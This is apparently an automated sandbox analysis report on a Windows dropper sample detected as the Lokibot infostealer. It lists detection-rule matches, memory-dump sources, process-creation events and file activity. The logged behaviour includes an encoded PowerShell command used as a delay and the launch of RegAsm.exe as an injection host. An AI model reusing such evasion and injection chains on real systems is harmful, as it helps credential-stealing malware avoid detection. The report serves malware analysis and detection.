                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000E.00000000.513382566.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000000.513382566.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeCode function: 0_2_0176A5A80_2_0176A5A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeCode function: 0_2_0176CDE00_2_0176CDE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493B5401_2_0493B540
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04933C001_2_04933C00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493E8F01_2_0493E8F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04933C001_2_04933C00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072C23E81_2_072C23E8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072C31481_2_072C3148
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072C4F701_2_072C4F70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072CA4091_2_072CA409
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameJaabwufwrbhhwmkpgfuy.dll" vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.511627239.0000000004FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJaabwufwrbhhwmkpgfuy.dll" vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJaabwufwrbhhwmkpgfuy.dll" vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519535055.000000000312E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000000.257527160.0000000000DA5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLgrdypvg.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.514692941.0000000001158000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeBinary or memory string: OriginalFilenameLgrdypvg.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeReversingLabs: Detection: 14%
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-DateJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -pJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kk3bso0d.u4o.ps1Jump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/9@21/2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
